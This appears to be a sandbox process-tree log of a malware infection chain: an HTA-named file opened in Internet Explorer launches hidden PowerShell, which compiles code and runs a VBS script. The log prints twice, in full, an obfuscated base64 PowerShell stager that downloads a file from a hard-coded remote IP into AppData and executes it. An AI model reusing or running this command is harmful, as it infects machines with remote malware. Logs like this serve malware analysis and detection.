iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\wesharelovetogethreforgetbestthingsonherefor.hta.html
2144cmd.exe "C:\Windows\system32\cmd.exe" "/c poWershell.exe -ex bYPass -NOp -w 1 -C dEviCEcREDENtIaLDePlOymeNT.ExE ; iex($(IEX('[system.teXT.ENcODInG]'+[ChaR]58+[CHAR]0X3a+'utF8.GEtSTrInG([sYStEm.ConvErT]'+[chAR]58+[Char]0X3a+'fROmBASE64strInG('+[CHAR]0x22+'JDlKNm5pICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZW1UbGUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExrTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkVNZFZxWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl4bE1ZcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmdreGlVelpKaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieVVLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ3ZkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOUo2bmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDkuMjQ4LjE0NC4xODQveGFtcHAva2Jjby9ncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvdS5naWYiLCIkRU5WOkFQUERBVEFcZ3JlYXRkYXlzcmV0dXJuYmFja2RvbnR3b3JyeWZvcmxvdmVzdG95by52YnMiLDAsMCk7U1RBcnQtc0xlRXAoMyk7SW5WT2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvLnZicyI='+[cHaR]34+'))')))"
1692powershell.exe poWershell.exe -ex bYPass -NOp -w 1 -C dEviCEcREDENtIaLDePlOymeNT.ExE ; iex($(IEX('[system.teXT.ENcODInG]'+[ChaR]58+[CHAR]0X3a+'utF8.GEtSTrInG([sYStEm.ConvErT]'+[chAR]58+[Char]0X3a+'fROmBASE64strInG('+[CHAR]0x22+'JDlKNm5pICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZW1UbGUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExrTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkVNZFZxWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl4bE1ZcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmdreGlVelpKaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieVVLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ3ZkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOUo2bmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDkuMjQ4LjE0NC4xODQveGFtcHAva2Jjby9ncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvdS5naWYiLCIkRU5WOkFQUERBVEFcZ3JlYXRkYXlzcmV0dXJuYmFja2RvbnR3b3JyeWZvcmxvdmVzdG95by52YnMiLDAsMCk7U1RBcnQtc0xlRXAoMyk7SW5WT2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvLnZicyI='+[cHaR]34+'))')))"
2548csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\vmuxw6e3.cmdline"
2468cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES5E63.tmp" "c:\Users\test22\AppData\Local\Temp\CSC5DE5.tmp"
2240wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\greatdaysreturnbackdontworryforlovestoyo.vbs"
2356